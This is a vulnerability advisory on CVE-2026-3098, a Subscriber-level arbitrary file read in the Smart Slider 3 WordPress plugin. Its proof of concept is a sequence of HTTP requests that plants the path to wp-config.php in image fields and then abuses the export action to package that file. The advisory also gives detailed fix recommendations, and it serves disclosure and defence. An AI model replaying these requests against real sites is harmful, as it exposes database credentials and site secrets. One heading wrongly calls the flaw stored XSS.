CVE-2026-3098 – Smart Slider 3 – LFI (Subscriber+) – POC

CVE-2026-3098 affects Smart Slider 3 and it enables an authenticated low privilege user to turn normal slider and image management flows into an arbitrary local file read. The practical impact is not limited to viewing a file inside the WordPress UI. The vulnerability chain can package the contents of server files into an exported Smart Slider archive, which the attacker can then download and inspect offline. This is dangerous because the exported artifact becomes a clean exfiltration channel for configuration files, credentials, and application secrets that should never leave the server. With an install base around 800k plus, this is a realistic risk for many sites where Subscriber accounts exist through registration, memberships, or WooCommerce, and where plugin permissions are often assumed to be safe by default.

CVE	CVE-2026-3098
Plugin Version	Smart Slider 3 <= 3.5.1.33
All Time	22 991 514
Active installations	800 000+
Publicly Published	March 26, 2026
Last Updated	March 26, 2026
Researcher	Dmitrii Ignatyev
PoC	Yes
Exploit	No
Reference	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3098 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/smart-slider-3/smart-slider-3-35133-authenticated-subscriber-arbitrary-file-read-via-actionexportall https://t.me/cleantalk_researches/396
Plugin Security Certification by CleanTalk
Logo of the plugin

Join the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.

Get Plugin Security Certificate

PSC by Cleantalk

Timeline

Discovery of the Vulnerability

The core weakness is a chainable set of Smart Slider 3 AJAX actions where at least one mutation path fails to enforce proper capability checks, and where a controller fallback behavior can be abused to reach export functionality without the expected permission and token validation. In the described chain, the attacker first uses benign actions such as listing sliders and creating a visual context for an image so the workflow looks legitimate and produces IDs that can be reused. Next, the image change action allows writing attacker controlled paths into image variant fields, which means values like /etc/passwd or a WordPress config path can be stored where the export logic later expects an image path. Finally, the export all action can be reached by abusing controller routing behavior, and the export routine reads the stored paths using file reads and embeds the content into the generated .ss3 package. The key security failure is that the system treats these internal fields as trusted and does not consistently gate every step with capability checks tied to the action being performed.

Understanding of LFI attack’s

Local File Inclusion in WordPress plugin ecosystems is often high severity because of the density of secrets stored on typical hosts. The most valuable target is usually wp-config.php because it can contain database credentials, salts, and integration secrets, and it often enables fast lateral movement into the database and full site compromise. System files like /etc/passwd are less sensitive on their own but still provide usernames and environment hints that accelerate follow on attacks, especially on shared hosting and container deployments where directory layouts and service accounts reveal how the stack is assembled. What makes CVE-2026-3098 more impactful than a basic file read is the export step. Export features are designed to move data across trust boundaries, so once a file can be injected into export input, the plugin itself becomes a courier that sends sensitive content out in a format that defenders may treat as normal admin activity.

Exploiting the Stored XSS Vulnerability

To exploit CVE-2026-3098, an attacker with Subscriber+ cookies:

POC:

GET /wordpress/wp-admin/admin-ajax.php?action=smart-slider3&nextendcontroller=foo&nextendaction=index HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/wordpress/wp-login.php?redirect_to=http%3A%2F%2F127.0.0.1%2Fwordpress%2Fwp-admin%2F&reauth=1
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: Subscriber+
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

GET /wordpress/wp-admin/admin-ajax.php?action=smart-slider3&nextendcontroller=sliders&nextendaction=list&nextend_nonce=c81a019740&parentID=0 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/wordpress/wp-login.php?redirect_to=http%3A%2F%2F127.0.0.1%2Fwordpress%2Fwp-admin%2F&reauth=1
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: Subscriber+
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

GET /wordpress/wp-admin/admin-ajax.php?action=smart-slider3&nextendcontroller=image&nextendaction=loadvisualforimage&nextend_nonce=c81a019740&image=https://smartslider3.com/wp-content/uploads/slider404/tutorialsliderthumbnail-1.png HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/wordpress/wp-login.php?redirect_to=http%3A%2F%2F127.0.0.1%2Fwordpress%2Fwp-admin%2F&reauth=1
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: Subscriber+
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

GET /wordpress/wp-admin/admin-ajax.php?action=smart-slider3&nextendcontroller=image&nextendaction=changevisual&nextend_nonce=c81a019740&visualId=5&value[desktop-retina][image]=&value[tablet][image]=/var/www/html/wordpress/wp-config.php&value[mobile][image]=/var/www/html/wordpress/wp-config.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/wordpress/wp-login.php?redirect_to=http%3A%2F%2F127.0.0.1%2Fwordpress%2Fwp-admin%2F&reauth=1
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: Subscriber+
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

GET /wordpress/wp-admin/admin-ajax.php?action=smart-slider3&nextendcontroller=foo&nextendaction=exportall&currentGroupID=0&sliders[]=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/wordpress/wp-login.php?redirect_to=http%3A%2F%2F127.0.0.1%2Fwordpress%2Fwp-admin%2F&reauth=1
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: Subscriber+
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

____

The main risk is confidentiality loss that can rapidly translate into full compromise. If an attacker can exfiltrate wp-config.php, they can obtain database credentials and authentication salts, then pivot into the database, extract user hashes, tamper with site content, or plant persistent backdoors through options and plugin settings. In managed hosting environments, reading service configs or environment files can expose API keys for SMTP, payment providers, analytics, and cloud services, creating cross system impact beyond WordPress. The export angle also creates stealth. Administrators and monitoring tools may treat slider exports as ordinary activity, so exfiltration can blend into normal plugin usage, especially if the attacker operates slowly and exports only a few sliders. The combination of low privilege access and high value data makes this a prime example of horizontal privilege becoming server level access through a plugin feature chain.

Recommendations for Improved Security

The fix must break the chain at multiple points, because the chain succeeds only when several controls are missing or inconsistent. Every Smart Slider 3 action that mutates state must enforce strict capability checks, and those checks must be aligned with the plugin permission model rather than relying on the presence of a nonce alone. The changevisual path should validate that image paths cannot be absolute filesystem paths and should only accept media library references or validated URLs that are then downloaded into a safe directory. Export routines must never read arbitrary file paths from stored data, and they should treat any file reference as untrusted unless it is an attachment ID that resolves to a file inside uploads. Controller routing must not allow fallback behavior that reaches privileged controllers or actions, and export endpoints should require both a strict capability and a per action nonce that is verified server side. Site owners should reduce exposure by restricting who can access Smart Slider admin features, auditing for unexpected exports, and rotating secrets if there is any suspicion of file disclosure, especially database credentials and authentication salts.

By taking proactive measures to address LFI like CVE-2026-3098 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.

#WordPressSecurity #LFI #WebsiteSafety #StayProtected #HighVulnerability

Use CleanTalk solutions to improve the security of your website

Dmitrii I.